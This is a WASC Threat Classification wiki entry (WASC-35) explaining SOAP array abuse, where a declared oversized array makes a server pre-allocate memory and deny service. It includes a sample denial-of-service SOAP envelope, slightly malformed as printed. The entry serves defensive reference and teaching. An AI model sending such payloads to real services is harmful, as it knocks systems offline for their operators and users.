• If you are citizen of an European Union member nation, you may not use this service unless you are at least 16 years old.

  • You already know Dokkio is an AI-powered assistant to organize & manage your digital files & messages. Very soon, Dokkio will support Outlook as well as One Drive. Check it out today!

View
 

SOAP Array Abuse

Page history last edited by Robert Auger 14 years, 3 months ago

Project: WASC Threat Classification

Threat Type: Attack

Reference ID: WASC-35

 

SOAP Array Abuse

XML SOAP arrays are a common target for malicious abuse. SOAP arrays are defined as having a type of "SOAP-ENC:Array" or a type derived there from. SOAP arrays have one or more dimensions (rank) whose members are distinguished by ordinal position. An array value is represented as a series of elements reflecting the array, with members appearing in ascending ordinal sequence. For multi-dimensional arrays the dimension on the right side varies most rapidly. Each member element is named as an independent element. A web-service that expects an array can be the target of a XML DoS attack by forcing the SOAP server to build a huge array in the machine's memory, thus inflicting a DoS condition on the machine due to the memory pre-allocation.

An example of this is the "DoS attack using SOAP arrays":

 

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope 
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" 
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
<SOAP-ENV:Body>
<fn:PerformFunction xmlns:fn="foo">
<DataSet xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="xsd:string[100000]">
<item xsi:type="xsd:string">Data1</item>
<item xsi:type="xsd:string">Data2</item>
<item xsi:type="xsd:string">Data3</item>
</DataSet>
</fn:PerformFunction>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

 

References 

W3C Simple Object Access Protocol (SOAP) Standard

[1] http://www.w3.org/TR/soap/

 

W3C Simple Object Access Protocol (SOAP) 1.1 - SOAP Arrays

[2] http://www.w3.org/TR/2000/NOTE-SOAP-20000508/#_Toc478383522

 

"Multiple Vendor SOAP server array DoS" (Mar 15 2004), Amit Klein

[3] http://www.securityfocus.com/archive/1/357436

 

The SOA/XML Threat Model and New XML/SOA/Web 2.0 Attacks & Threats (Defcon 15), Steve Orrin

[4] http://www.safesoa.org/data/dc-15-Orrin-v2.pdf

Comments (0)

You don't have permission to comment on this page.